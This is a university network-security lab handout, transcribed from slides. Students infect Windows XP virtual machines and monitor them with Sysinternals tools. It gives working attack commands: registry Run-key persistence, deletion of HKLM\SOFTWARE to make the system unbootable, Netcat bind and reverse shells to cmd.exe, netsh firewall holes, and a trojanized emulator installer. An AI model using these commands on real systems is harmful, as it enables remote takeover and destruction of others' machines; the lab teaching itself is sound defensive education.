System Monitoring with Sys-Internals Lab
Upcoming SlideShare
Loading in...5
×

Like this? Share it with your network

Share

System Monitoring with Sys-Internals Lab

  • 1,115 views
Uploaded on

 

  • Full Name Full Name Comment goes here.
    Are you sure you want to
    Your message goes here
    Be the first to comment
    Be the first to like this
No Downloads

Views

Total Views
1,115
On Slideshare
1,115
From Embeds
0
Number of Embeds
0

Actions

Shares
Downloads
30
Comments
0
Likes
0

Embeds 0

No embeds

Report content

Flagged as inappropriate Flag as inappropriate
Flag as inappropriate

Select your reason for flagging this presentation as inappropriate.

Cancel
    No notes for slide

Transcript

  • 1. ECE 4112 Internetwork Security Lab: System Monitoring with Sys-Internals and C script infection Created by Jason Orlosky, Phillip Michael, and Todd Lyon Date Assigned: Date Due: Last Edited: Please read the entire lab and any extra materials carefully before starting. Be sure to start early enough so that you will have time to complete the lab. Answer ALL questions in the provided Answer Sheet and be sure you turn in ALL materials listed in the Turn-in Checklist on or before the Date Due. Goal: This lab will help you understand how to infect a Windows system and then monitor the system to detect any changes with Sys-internals. It will also review infecting a system with c scripts. Summary: In lab, you will be infecting machines in various ways. First you will infect the registry manually and then monitor to see what changes have been made. You will also learn how to disable a Windows operating system by modifying the registry. Then you will investigate how a c script works and infects a system by opening ports. Background: References on the registry and how it works can be found here: http://support.microsoft.com/default.aspx?scid=kb;en-us;256986 Prelab Questions: None Lab Scenario: None
  • 2. Section 1: Registry Manipulation and Having evil fun Intro / Background In this part of the lab, you will be manipulating the windows registry. The windows registry is a part of windows that contains information about all programs on the windows system as well as vital system information. The registry can be used to configure programs, drivers, and system settings by modifying its keys. The registry is also important for startup of the system since it has replaced files such as .ini files, autoexec.bat, and Config.sys from previous operating systems. You will be creating another copy of WindowsXP in Vmware to infect. You will see how to create registry keys to keep a virus alive on a system and how to disable the system’s OS by deleting essential registry keys. We will also see how to detect registry modifications and prevent their improper use. The tools we will be using in lab are Regedit, the Sys-internal, RegMon, registry editing commands, batch files, and the Jetico Firewall. Note that the methods of infection we will be reviewing are for after a virus has been put on a host system. Many of the new viruses and spyware today use the Windows Registry as a starting point for re-infection. Modifying Registry Keys Here are several commands that can be used in a command prompt or via software to modify the registry: 1) Adding a key: REG ADD RegistryPath /V Name /d Data 2) Modifying an existing key: REG UPDATE RegistryPath /V Name /d Data 3) Deleting a key: REG DELETE RegistryPath [/FORCE] Additional commands for modifying or searching the registry can be found in appendix B. Type “reg” in the command line for a list of commands in the registry editor. Typing a specific command and then “/?” will give you parameters and examples of how to use that command. Instead of having to type various commands on the command line, we can make use of windows batch files. This will also enable us to modify keys without actually having to open a command window. A coder can create .exe files to have the same functionality, but for this part of the lab, batch files will serve our purpose. The syntax of a batch file will be explained in the sections describing methods of infection. First we need to create a new virtual copy of windows since we will eventually make the OS unbootable through the registry. Refer to Appendix C on how to make a copy of your WindowsXP virtual machine.
  • 3. After you have made a copy, boot it and proceed. Sample Registry Modification: The first section of the registry we will infect is the location of windows startup items. To begin, we will take a look at what the registry looks like in a hierarchal file folder format. Each of these folders that contains registry values is called a hive. 1) Click Start -> Run and in the text field, type regedit and then enter. - This program can be used on any Windows Machine to modify registry keys in a GUI format. You should see the following window on your screen after hitting enter: 2) Navigate to the following location in the gui by expanding the corresponding hives. - HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun Here you should see several programs which will start up with the operating system after booting. Keys can be added to this location to start programs. 3) Add the following key to the registry via the command line. REG ADD HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun (on same line) /v CMDstarter /d “C:WINDOWSSYSTEM32cmd.exe” /v specifies the value of the key and /d specifies the data After adding the key via the command line, refresh the contents of the Run hive by clicking on another folder in the registry and then back to the Run hive. Q1.1 List the keys you see in the registry including the key you just added. Be sure to show the names and data of each key.
  • 4. Remove the new CMDstarter key from the registry using RegEdit. Just right click on the specified key and click delete. Click ok when asked if you are sure if you want to delete the file. Keeping a Virus Alive on a System: To show how adding registry keys in this location is useful, we have written a batch file that installs a virus. The batch file, once on the system, will install and run the virus from a separate file. Generally, a user can detect if a virus is running by running the task manager and checking for malicious looking programs. We can disguise the installation file as a different file which will only run for a few seconds to install and run the virus. This way, an untrained administrator will be unable to tell why the virus is re-infecting the system. 1) Download the following files and folders from the NAS server onto your WindowsXP virtual machine. - HiddenFolder: Contains Infect.bat and RenameMe.exe - Regmon.exe 2) Run the Infect.bat file by double clicking it. - This is the file that will actually infect the system. It should only run for a fraction of a second before the viral code executes. - Start the task manager by right clicking on the start bar and clicking ‘Task Manager.’ This can also be done by using ctl+alt+del. - Notice the MrMalicious.exe process that is running in the task manager. Ignore the inner workings of MrMalicious for now. - This is primarily to show simply that the Infect.bat file will add a registry key to install and run the MrMalicious program. A hacker could add code to MrMalicious to harm a system. The MrMalicious.exe we have written simply takes up CPU time. 3) Open regedit again and navigate to the same Run folder we edited before. Notice how the Infect.bat file has been added as a registry key. 4) Click Start -> My Computer - Navigate to C:Windows - Find the exe file called MrMalicious and delete it 5) Restart the WindowsXP virtual machine. The MrMalicious process should now be running just after startup. Notice that startup takes longer since the MrMalicious program is taking up CPU time. 6) Edit your Infect.bat file by right clicking and selecting edit from the menu. Review the code in the batch file to answer the following question.
  • 5. Q1.2 Explain how the Infect.bat file infects the system so that the viral process “MrMalicious.exe” continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary. Attachment # 1 7) Create a batch file using the commands in Appendix A and B to remove the key in the following folder and add a new key with your Name as the Name and no data. HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet Audio Feel free to use existing batch files as a reference. Attach the code for this batch file to the end of your lab. Disabling antivirus and firewall programs with the registry 1) The registry can easily be used to disable programs that start up with the computer. -Download the Jetico Firewall (Jpfwall.exe) from the NAS server and install it by double clicking on the exe file. - Choose all the default options for installation but do NOT restart when prompted after the installation process. This installation will demonstrate how standard programs assert themselves on a system and start up. 2) Navigate to the Run folder and notice that the firewall has inserted a key that will start it after the system boots. In order to remove it without manually using the registry editor a very simple scheme can be used to prevent anything from starting up on the host system. - Windows will restore several of the basic keys in the Run folder by default to start certain services such as quicktime. A hacker could remove all of the keys in the Run folder on his or her system and then export that key into a backup file. Registry backup files can be double-clicked and will re-insert themselves into the registry, replacing old keys of the same title. Running the backup of a blank run folder would replace all the startup items with nothing. 3) Remove this registry key with Regedit and uninstall the firewall through the Control Panel -> Add/Remove programs. Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker’s software would have to do in order to prevent a specific program from starting up such as Norton Antivirus or ZoneAlarm Firewall. (Hint: The query command would be useful)
  • 6. Section 2: Detecting Registry Modification and Removing malicious keys: We will use the Sys-internal RegMon to monitor our system’s registry accesses and modifications. RegMon is an excellent tool since it shows all registry accesses with time, process, path, and data. These attributes will be extremely valuable in determining which keys have been added by a viral program. 1) Download the RegMon tool from the NAS and run it. - The tool will immediately begin capturing registry entries. Most of these entries are valid entry accesses by windows programs. In order to detect invalid or malicious registry keys, we need to begin filtering the valid registry keys, so only malicious ones will be logged. 2) After about 20 seconds of capturing, click file and uncheck ‘capture events.’ - You should now have several hundred entries with which to start filtering. - The easiest way to begin filtering is with process names. 3) Click options -> filter/highlight and the following window will appear. Enter some of the names of processes such as “Explorer; svchost; winlogon” to exclude from the display. Filter options are separated by commas. Begin filtering again by re-checking the ‘capture events’ option.
  • 7. Keep adding to the filter string while registry reads and writes are occurring. You will see that fewer and fewer reads and writes show up on the list. 4) Once most of the very commonly occurring processes have been filtered out, run the Infect.bat file used in the beginning of the lab. Screenshot #1 Search through the registry accesses and locate the malicious key. Highlight the key in the RegMon and take a screenshot. Include this with your lab for turn-in. The easiest way to delete this maliciously added key is to use Regedit and navigate to the key’s hive. Do this now and delete the key using delete from the right click menu. Disabling the Operating system by deleting essential keys: Note: This part of the lab is EXTREMELY malicious, do not do this to your friends!!!!! Unfortunately for Microsoft, the registry is an essential point of operation for windows. It carries information about all windows processes. Some of these processes require registry keys in order to run. We will disable the operating system by removing several essential folders in the regisrty. 1) Start regedit. 2) Delete the following key, click ok if an error is generated and reboot the VM. - HKEY_LOCAL_MACHINESOFTWARE This could also be accomplished by typing the following in the command line. REG DELETE HKEY_LOCAL_MACHINESOFTWARE Restarting the system will not work. This is extremely effective because the system will not even start in safe mode!!! A user or admin must repair or re-install the operating system from external bootable media. Screenshot #2 Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot. In order to prevent this from happening, a user should back up the whole registry on a separate disk. Users can back up the registry by exporting major keys via regedit. He or she could boot from a Windows CD and re-insert the keys into the registry from the backup file, keeping information about current programs. If the user did not have these backups, he or she would be forced to repair or re-install the operating system. Neither repairing nor re-installing would recover data from programs that are not on the Windows CD such as AOL Instant Messenger or Microsoft Office.
  • 8. Q2.4 Why is it that not many hackers have used the registry to disable operating systems? Section 3: Making use of the Windows registry and other command line options to exploit Windows. In this section of the lab, we will be implementing basic C programming along with the Netcat tool to exploit the Windows XP registry and the Windows XP firewall, so that root access to a Windows XP machine, with SP 2 installed, can be gained. For this section of the lab, a new Windows XP virtual machine with SP2 installed will need to be created. In order to do this please follow the instructions from “LAB 1: OS Installation and Introduction to Security Tools” on creating a Virtual Machine, you will need to make sure an Image of Windows XP with SP2 is available on the NAS or from the TA. We will also be using our RedHat 7.2 virtual machine as the attacker, please make sure Netcat is installed on this virtual machine as well. Information on installing Netcat for both the Windows XP and RedHat 7.2 virtual machines can be found in “LAB 6: Backdoors and Trojans”, a copy of this information is also provided in Appendix D, along with descriptions of the basic functions of Netcat. To begin with please make sure to install Netcat in a new directory called C:nc11nt on the Windows XP machine (Netcat should already be installed on the RedHat 7.2 machine, if not follow the instructions in Appendix D), and turn on both the RedHat 7.2 (i.p. 57.35.6.x+1), and Windows XP (i.p. 57.35.6.x+3) Virtual Machines. Refamiliarizing Ourselves with Netcat and the Windows XP firewall Before we review some basic Netcat commands, make sure the Windows XP firewall is enabled in your Windows XP virtual Machine. To do this, go to the control panel, and then access the option called “Windows Firewall”. Make sure that under the general tab, the firewall is set to “ON”, but that the “Don’t allow exceptions” box is not checked. Next take just a few moments to review the Netcat parameters in appendix D. At this point before continuing with the lab, take a snapshot of the Windows XP SP2 virtual machine. We will be reverting back to this snapshot later in this section of the lab. The options to do this should be at the top of the virtual machine. If for some reason, you are in a view in which you are unable to access this option, ask a TA for assistance. Now on the Windows XP machine go to Start -> Run, and type “cmd”. Next go to the C:nc11nt directory by typing cdnc11nt. While in the Netcat directory type “nc –L –p 8633 -e cmd.exe”. After running this command, you should see a windows security alert. This is because the firewall by default is set to not allow incoming traffic on port 8633, and Netcat is in listen mode expecting a connection on this port.
  • 9. Screenshot #3 Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program. Now choose to “Keep Blocking the port”. The Netcat program is still trying to listen on the port. On your 8.0 Machine open up ethereal, and start packet capture in promiscuous mode. Switch to your RedHat 7.2 machine, and from the terminal try the command “nc 57.35.6.x+3 59”. Now stop capture in ethereal and view the packets. Q3.1 What does ethereal show transpired between the 7.2 and Windows XP machines? Why did this occur? Hit control-C on both the Windows XP and RedHat 7.2 command lines. Now from the 7.2 command line run nmap against the Windows machine (“nmap 57.35.6.x+3”). Pick a port listed is open and now run the command from the Windows command line “nc –L –p “open_port” –e cmd.exe”. Notice that no Windows Security Alert pops up. Now from the 7.2 machine run nc 57.35.6.x+3 “open_port”. Notice this still doesn’t work. Even using Netcat’s –s option (see man nc in 7.2 for more information on the –s option) and binding a port picked up by nmap does not allow the 7.2 machine to connect. So now what? From the Windows command line, type in the command “netsh firewall show portopening”. Q3.2 What does this command show? If there are any additional ports (ones not found from the port scan), they may be able to be used to gain access on with Netcat. To do this you can try to run “nc –L –p “additional_port” –e cmd.exe” from the Windows machine, and then nc 57.35.6.x+3 “additional_port” from the 7.2 machine. However to be safe, or rather to avoid any further Windows Security Alerts, it is better to just go ahead and set up the firewall to accept traffic to Netcat on a certain port. To start with, from the windows command line, type “netsh firewall” to view a list of commands available when editing or viewing the firewall. Now type “netsh firewall add”, doing this gives you possible parameters for the add command. As you can see by playing around with the various commands, many options are available to you, and the Windows XP firewall for SP2 can be manipulated however you choose. When looking at the firewall options from the control panel earlier, you may remember the box that could be checked to not allow exceptions. In order to turn this off, all you have to do is type “netsh firewall reset” and the Windows XP firewall is reset to it’s default state, which is set to allow exceptions. This a huge insecurity in the firewall.
  • 10. In our case we want to poke a hole through this firewall to allow access to the Windows XP machine via Netcat. To do this we will use the command: “netsh firewall add portopening protocol = ALL port = 8633 name = nc mode = ENABLE scope = ALL profile = ALL” Entering this one command from the Windows XP command line allows an opening in the firewall specifically for Netcat (nc.exe) on port 8633 for both TCP and UDP protocols, and for all users if executed with administrator access. After entering this command, let’s retry our original attempt to gain access to the Windows machine. From the Windows XP command prompt, type “nc –L –p 8633 –e cmd.exe”. Now from the 7.2 machine, type “nc 57.35.6.x+3 8633”. SUCCESS!!! Notice that as soon as you close the command window in windows, you lose connection on the 7.2 machine. In order to avoid this, From the Windows XP command prompt, type “nc –L –p 8633 –e cmd.exe –d”. Now close the command window, and attempt to connect again. The –d option allows Netcat to run silent. If you hit ctrl-alt-del in windows you can find nc.exe in the process manager. Using Knowledge of Netcat, The Windows Registry, The Windows Firewall, and basic C programming to write an exploit At this point use the revert option on the top of the Windows XP SP2 virtual machine to revert Windows back to the state found towards the beginning of this section. This is done in order to restore the Windows XP firewall. At this point in the lab, let us pretend we are a hacker with not so pleasant intentions operating from the RedHat 7.2 machine. The Windows XP machine is being operated by either a Co-worker, schoolmate, roommate, or anyone you can think of that would be found on the same network as you (i.e. no router is separating you). On the Windows XP machine, download the ZSNES.zip file from the NAS and put it on the Windows XP machine in a new folder. This file is a self extracting zip that installs the ZSNES Super Nintendo Emulator (a freeware SNES emulator for the PC). In addition to installing the emulator this self extracting zip also installs Netcat, and executes another program called installer.exe (also known as Trojan 8633 – 8633 being the numeric representation of TODD [for Todd Lyon the author of this exploit, and for that matter the author for this section of this lab]. Thinking he is in for an exciting afternoon of playing Super Mario World, and possibly even a little Ogre Battle, our unsuspecting Windows XP user is more than happy to take and install the emulator you give him. After he installs it, you have administrative access to his machine, for as long is you are on the same network with him (assuming he is not extremely knowledgeable of his Registry, or Firewall, or doesn’t decide to format his hard drive).
  • 11. At this point, run the self extracting ZSNES.zip file. You will notice a couple OK’s popping up in a command prompt, and then you will be in a folder with the newly installed ZSNES emulator. From the RedHat 7.2 machine, type “nc 57.35.6.x+3 8633”. After this you will be in the Windows XP machines command prompt. Now, power off the Windows machine, and restart it. Q3.3 What happens when you restart the Windows XP machine, and try to connect from the RedHat 7.2 machine with Netcat? For Netcat to still be running in listen mode after rebooting the computer, the registry had to have been altered by the installer.exe file. But How? The Windows XP registry has six registry keys designated for launching programs when starting up the computer. They are: HKCUSoftwareMicrosoftWindowsCurrentVersionRun - Launches program when specific user logs in HKCUSoftwareMicrosoftWindowsCurrentVersionRunOnce - Launches program when specific user logs in next time, then is removed from the registry HKLMSoftwareMicrosoftWindowsCurrentVersionRun - Launches program automatically at system startup HKLMSoftwareMicrosoftWindowsCurrentVersionRunOnce - Launches program automatically at system startup on next startup, then is Removed from the registry. HKLMSoftwareMicrosoftWindowsCurrentVersionRunServices - Launches service automatically at system startup (e.g. AIM) HKLMSoftwareMicrosoftWindowsCurrentVersionRunServicesOnce - Launches service automatically at system startup on next startup, then is Removed from the registry. At this time download the files installer.c, and server.c and view the code used for this attack. Looking in the installer.c file, we can see that the entire program is made up of system calls.
  • 12. Looking at the seventh system call, the command “reg add hklmSOFTWAREMicrosoft WindowsCurrentVersionRun /v update /t REG_SZ /d c:windowssystem32server.exe / f” is run. This command adds to the HKLMSoftwareMicrosoftWindowsCurrentVersionRun key, which launches programs automatically at system startup. The server.exe file is the file run when the machine is started. Looking at the server.c file, you can see that all it does is run the “nc –L –p 8633 –e cmd.exe –d” command. From the exploited Windows machine, bring up a command prompt and run the command regedit. Screenshot #4 Take a screenshot of the the entry running server.exe highlighted in the registry editor Modifying The 8633 Exploit to Access a Machine outside of our Network Using the same concept of giving the self extracting zip to some unsuspecting Windows XP user, we want to find a way to access their machine if we are on a separate network from them. In order to do this, we have to find a way to talk to their machine without the router dropping all the packets we are trying to send them. The easiest way to do this, is to have their machine Syn our machine. This way they initiate the connection. If we simply change the eighth system call of installer.c from “ nc –L –p 8633 –e cmd.exe –d” to “ nc “your_ip” 8633 –e cmd.exe –d” and have our machine waiting in listen mode on port 8633, as long as no firewall is blocking our port 8633, we will have a shell to their command prompt. Because we are using exe files when attacking Windows system, the installer.c file needs to be compiled in Windows. Fortunately the Microsoft C/C++ Optimizing Compiler and Linker are freely available. The Compiler can be found at http://msdn.microsoft.com/visualc/vctoolkit2003/. Microsoft’s linker is available at http://www.microsoft.com/whdc/devtools/debugging/installx86.mspx.
  • 13. However for the purpose of this lab, the compiler and debugger can both be found on the NAS. After installing these tools, to compile the new code we use the command “cl /Zi / MLd /Fe installer2.c”. In order to create a self extracting zip, Zip 2 secure was used (attained at “www.download.com”). Q3.4 How can you detect malicious code such as the 8633 program running on your computer? Q3.5 What should you do avoid having malicious code such as this installed on your machine in the first place? Section 4: More monitoring with Sys-internals In this part of the lab you will be monitor your system as a virus is unleashed. To monitor the virus we will be using 4 utilities from http://sysinternals.com and ethereal. These utilities will log Registry Accesses(Regmon), File Accesses(FileMon), Network Accesses(TDIMon), Network Traffic(ethereal) and view Live Process Information(Process Explorer). Task Guide 1. Install Winpcap and for the network share. 2. Copy the sysinternals folder to your desktop 3. Start Ethereal Capturing packets 4. Open the sysinternals folder a. Start Regmon located in the ntregmon folder b. Start Filemon located in the ntfilemon folder c. Start TDIMon located in the tdimonnt folder d. Start Process Explorer located in the procexnt folder 5. Execute the virus (document.pif) 6. Switch to Process Explorer a. In Process Explorer find the virus Q 4.1 - What is the name of the virus process loaded in memory? b. Right click on the virus process & select properties i. then select the TCP/IP tab Q 4.2 - Is this process running a server? Q 4.3 - If yes, What port is it listening on? ii. Close the properties windows 7. Let’s find out what service is running on port you just discovered a. Open a command prompt(Start->Run “cmd”)
  • 14. i. Telnet to the port ex. “telnet 127.0.0.1 21” if the port is 21 Q 4.4 - What type of server does this appear to be? ii. Next try ftping to the port ex. “ftp (enter) o 127.0.0.1 21” Q 4.5 - Do you receive a login prompt? iii. If so try login 1. logout by typing “bye” S 4.1 - Take a screen capture of your ftp session. b. Right click on the virus process, select kill process.& close the Process Explorer 8. Switch to Ethereal a. Stop the capture b. Q 4.6 - What port number do you see a large number of connections to? Help: try using this filter ”tcp.flags == 2” c. Q 4.7 - Why do you think this is? d. Since your not on a live internet connection open the virus3.pcap file This file is a capture of the same virus on a live internet connection. i. Q 4.8 - What port are connections extablished to? Help: try using this filter ”tcp.flags == 0x12” right click and follow the some of the TCP Stream ii. Q 4.9 - What is it connecting to these 2 different ports for? 9. Switch to the Registry Monitor a. Q 4.10 - What is the virus repeatively doing to the registry, and why do you think this is? b. S 4.2 Take a screen capture of this 10. Switch to the Filemon a. Use filemon to find the answers to the following questions i. Q 4.11 - What is the name and path of the executable created once document.pif is executed? ii. Q 4.12 - There are 3 files created to replicate the virus on the hard drive where are they and what are there names? iii. Q 4.13 - Why do you think the virus searches for files on the hard drive? Hint: It has to do with the traffic going to port 25 11. Switch to TDIMON a. The virus is trying to make open allot of connections to hosts i. Q 4.14 - What port is it trying to connect to and why? ii. S 4.3 - Take a screen capture of this 12. Remove the virus (or remove the VMWare Image) a. Execute FixMytob.exe Q 4.15 - What is the an advantage of active logging over active monitoring?
  • 15. Questions Q1.1 List the keys you see in the registry including the key you just added. Be sure to show the names and data of each key. Screenshot #1 Take a screenshot of the failed system and attach it to your lab report. Q1.2 Explain how the Infect.bat file infects the system so that the viral process “MrMalicious.exe” continues to be present even after it is deleted and the system is restarted. Use Appendix A and B as references if necessary. Attachment # 1 Create a batch file using the commands in Appendix A and B to remove the key in the following folder and add a new key with your Name as the Name and no data. HKEY_LOCAL_MACHINESOFTWAREMicrosoftInternet Audio Feel free to use existing batch files as a reference. Attach the code for this batch file to the end of your lab. Q1.3 How would someone remove solely the firewall key without knowing its title? Describe what a hacker’s software would have to do in order to prevent a specific program from starting up such as Norton Antivirus or ZoneAlarm Firewall. (Hint: The query command would be useful)
  • 16. Screenshot #2 Search through the registry accesses and locate the malicious key. Highlight the key in the RegMon and take a screenshot. Include this with your lab for turn-in. Q2.4 Why is it that not many hackers have used the registry to disable operating systems? Screenshot #3 Take a screenshot of the failed system and attach it to your lab report. On the screenshot, describe what happened upon reboot. Screenshot #4 Take a screenshot of the Windows Security Alert asking if you want to keep blocking the nc program. Q3.5 What does ethereal show transpired between the 7.2 and Windows XP machines? Why did this occur? Q3.6 What does this command show?
  • 17. Q3.7 What happens when you restart the Windows XP machine, and try to connect from the RedHat 7.2 machine with Netcat? Screenshot #5 Take a screenshot of the the entry running server.exe highlighted in the registry editor Q3.8 How can you detect malicious code such as the 8633 program running on your computer? Q3.9 What should you do avoid having malicious code such as this installed on your machine in the first place? Turn-in Checklist Turn in the: - Answer sheet - Screenshots 1-5 - Comments and Additions
  • 18. Appendix A: Registry Commands via Windows command line Console Registry Tool for Windows - version 3.0 Copyright (C) Microsoft Corp. 1981-2001. All rights reserved REG Operation [Parameter List] Operation [ QUERY | ADD | DELETE | COPY | SAVE | LOAD | UNLOAD | RESTORE | COMPARE | EXPORT | IMPORT ] For help on a specific operation type: REG Operation /? Examples: REG QUERY /? REG ADD /? REG DELETE /? REG COPY /? REG SAVE /? REG RESTORE /? REG LOAD /? REG UNLOAD /? REG COMPARE /? REG EXPORT /? REG IMPORT /? Registry Add example parameters
  • 19. REG ADD KeyName [/v ValueName | /ve] [/t Type] [/s Separator] [/d Data] [/f] KeyName [Machine]FullKey Machine Name of remote machine - omitting defaults to the current machine Only HKLM and HKU are available on remote machines FullKey ROOTKEYSubKey ROOTKEY [ HKLM | HKCU | HKCR | HKU | HKCC ] SubKey The full name of a registry key under the selected ROOTKEY /v The value name, under the selected Key, to add /ve adds an empty value name <no name> for the key /t RegKey data types [ REG_SZ | REG_MULTI_SZ | REG_DWORD_BIG_ENDIAN | REG_DWORD | REG_BINARY | REG_DWORD_LITTLE_ENDIAN | REG_NONE | REG_EXPAND_SZ ] If omitted, REG_SZ is assumed /s Specify one charactor that you use as the separator in your data string for REG_MULTI_SZ. If omitted, use "0" as the separator /d The data to assign to the registry ValueName being added /f Force overwriting the existing registry entry without prompt Examples: REG ADD ABCHKLMSoftwareMyCo Adds a key HKLMSoftwareMyCo on remote machine ABC REG ADD HKLMSoftwareMyCo /v Data /t REG_BINARY /d fe340ead Adds a value (name: Data, type: REG_BINARY, data: fe340ead) REG ADD HKLMSoftwareMyCo /v MRU /t REG_MULTI_SZ /d fax0mail Adds a value (name: MRU, type: REG_MUTLI_SZ, data: fax0mail00) REG ADD HKLMSoftwareMyCo /v Path /t REG_EXPAND_SZ /d %%systemroot%% Adds a value (name: Path, type: REG_EXPAND_SZ, data: %systemroot%) Notice: Use the double percentage ( %% ) inside the expand string C:Documents and Settingsdefault>
  • 20. Appendix B: Commands for batch files via the Windows command line. The following was referenced from: http://www.ss64.com/nt/ More detailed explanations can be found there as well. Note: Some of these commands are version dependent. An A-Z Index of the Windows NT/XP command line ADDUSERS Add or list users to/from a CSV file ARP Address Resolution Protocol ASSOC Change file extension associations ASSOCIAT One step file association AT Schedule a command to run at a later time ATTRIB Change file attributes BROWSTAT Get domain, browser and PDC info CACLS Change file permissions CALL Call one batch program from another CD Change Directory - move to a specific Folder CHANGE Change Terminal Server Session properties CHKDSK Check Disk - check and repair disk problems CHKNTFS Check the NTFS file system CHOICE Accept keyboard input to a batch file CIPHER Encrypt or Decrypt files/folders CleanMgr Automated cleanup of Temp files, recycle bin CLEARMEM Clear memory leaks CLIP Copy STDIN to the Windows clipboard. CLS Clear the screen CLUSTER Windows Clustering CMD Start a new CMD shell COLOR Change colours of the CMD window COMP Compare the contents of two files or sets of files COMPACT Compress files or folders on an NTFS partition COMPRESS Compress individual files on an NTFS partition CON2PRT Connect or disconnect a Printer CONVERT Convert a FAT drive to NTFS. COPY Copy one or more files to another location CSVDE Import or Export Active Directory data DATE Display or set the date Dcomcnfg DCOM Configuration Utility DEFRAG Defragment hard drive DEL Delete one or more files DELPROF Delete NT user profiles DELTREE Delete a folder and all subfolders DevCon Device Manager Command Line Utility DIR Display a list of files and folders DIRUSE Display disk usage DISKCOMP Compare the contents of two floppy disks DISKCOPY Copy the contents of one floppy disk to another DNSSTAT DNS Statistics DOSKEY Edit command line, recall commands, and create macros DSADD Add user (computer, group..) to active directory DSQUERY List items in active directory DSMOD Modify user (computer, group..) in active directory ECHO Display message on screen
  • 21. ENDLOCAL End localisation of environment changes in a batch file ERASE Delete one or more files EXIT Quit the CMD shell EXPAND Uncompress files EXTRACT Uncompress CAB files FC Compare two files FDISK Disk Format and partition FIND Search for a text string in a file FINDSTR Search for strings in files FOR Conditionally perform a command several times FORFILES Batch process multiple files FORMAT Format a disk FREEDISK Check free disk space (in bytes) FSUTIL File and Volume utilities FTP File Transfer Protocol FTYPE Display or modify file types used in file extension associations GLOBAL Display membership of global groups GOTO Direct a batch program to jump to a labelled line HELP Online Help HFNETCHK Network Security Hotfix Checker IF Conditionally perform a command IFMEMBER Is the current user in an NT Workgroup INSTSRV Install an NT Service IPCONFIG Configure IP KILL Remove a program from memory LABEL Edit a disk label LOCAL Display membership of local groups LOGEVENT Write text to the NT event viewer. LOGOFF Log a user off LOGTIME Log the date and time in a file MAPISEND Send email from the command line MEM Display memory usage MD Create new folders MODE Configure a system device MORE Display output, one screen at a time MOUNTVOL Manage a volume mount point MOVE Move files from one folder to another MOVEUSER Move a user from one domain to another MSG Send a message MSIEXEC Microsoft Windows Installer MSINFO Windows NT diagnostics MUNGE Find and Replace text within file(s) MV Copy in-use files NET Manage network resources NETDOM Domain Manager NETSH Configure network protocols NETSVC Command-line Service Controller NBTSTAT Display networking statistics (NetBIOS over TCP/IP) NETSTAT Display networking statistics (TCP/IP) NOW Display the current Date and Time NSLOOKUP Name server lookup NTBACKUP Backup folders to tape NTRIGHTS Edit NT user account rights PATH Display or set a search path for executable files PATHPING IP trace utility PAUSE Suspend processing of a batch file and display a message
  • 22. PERMS Show permissions for a user PERFMON Performance Monitor PING Test a network connection POPD Restore the previous value of the current directory saved by PUSHD PORTQRY Display the status of ports and services PRINT Print a text file PRNCNFG Display, configure or rename a printer PRNMNGR Add, delete, list printers set the default printer PROMPT Change the command prompt PUSHD Save and then change the current directory QGREP Search file(s) for lines that match a given pattern. RASDIAL Manage RAS connections RASPHONE Manage RAS connections RECOVER Recover a damaged file from a defective disk. REG Read, Set or Delete registry keys and values REGEDIT Import or export registry settings REGSVR32 Register or unregister a DLL REGINI Change Registry Permissions REM Record comments (remarks) in a batch file REN Rename a file or files. REPLACE Replace or update one file with another RD Delete folder(s) RDISK Create a Recovery Disk RMTSHARE Share a folder or a printer ROBOCOPY Robust File and Folder Copy ROUTE Manipulate network routing tables RUNAS Execute a program under a different user account RUNDLL32 Run a DLL command (add/remove print connections) SC Service Control SCLIST Display NT Services ScriptIt Control GUI applications SET Display, set, or remove Windows NT environment variables SETLOCAL Begin localisation of environment changes in a batch file SETX Set environment variables permanently SHARE List or edit a file share or print share SHIFT Shift the position of replaceable parameters in a batch file SHORTCUT Create a windows shortcut (.LNK file) SHOWGRPS List the NT Workgroups a user is in SHOWMBRS List the members of an NT Workgroup SHUTDOWN Shutdown the computer SHUTGUI Shutdown the computer SLEEP Wait for x seconds SOON Schedule a command to run in the near future SORT Sort input START Start a separate window to run a specified program or command SU Switch User SUBINACL Edit file and folder Permissions, Ownership and Domain SUBST Associate a path with a drive letter TASKLIST List running applications and services TIME Display or set the system time TIMEOUT Delay processing of a batch file TITLE Set the window title for a CMD.EXE session TOUCH Change file timestamps TRACERT Trace route to a remote host TREE Graphical display of folder structure TYPE Display the contents of a text file
  • 23. USRSTAT List domain usernames and last login VER Display version information VERIFY Verify that files have been saved VOL Display a disk label WHERE Locate and display files in a directory tree WHOAMI Output the current UserName and domain WINMSD Windows NT Diagnostics WINMSDP Windows NT Diagnostics II WMIC WMI Command XCACLS Change file permissions XCOPY Copy files and folders
  • 24. Appendix C – Making a copy of a virtual machine Follow these directions to set up your second virtual machine: On your RedHat 8.0 Host, in the root directory make a new directory called WinXPProCopy # cd /root # mkdir winXPProCopy Copy all files from WinXPPro directory into this new directory # cp winXPPro/* winXPProCopy/ This will take a while to complete. Now to set up the new virtual machine: Start up VMWare, and go to File -> New - > New Virtual Machine. Choose Custom and click Next. Select the operating system as Windows XP Professional Change the name of the new machine to winXPProCopy and change the directory to /root/winXPProCopy. Click Next Adjust the virtual memory so that you can run all three machines at the same time. Bring it down to 128mb for now. Select Bridged networking and click Next. Choose “Use an existing virtual disk” and click Next. Click Browse and choose the file called winXPPro.vmdk in the new directory. Click Finish. This will create a new virtual machine on your host system. You will need to change the ip address of the new WinXP virtual machine. Change it to the old WinXP machine address + 1. For example, if it was w.x.y.z of the original XP machine, change it to w.x.y.z+1. To do this: Start the new virtual machine. Click Start -> Control Panel Network and Internet Connections Network Connections Right Click on local area connections Properties Select TCP/IP Properties Make your changes and click OK
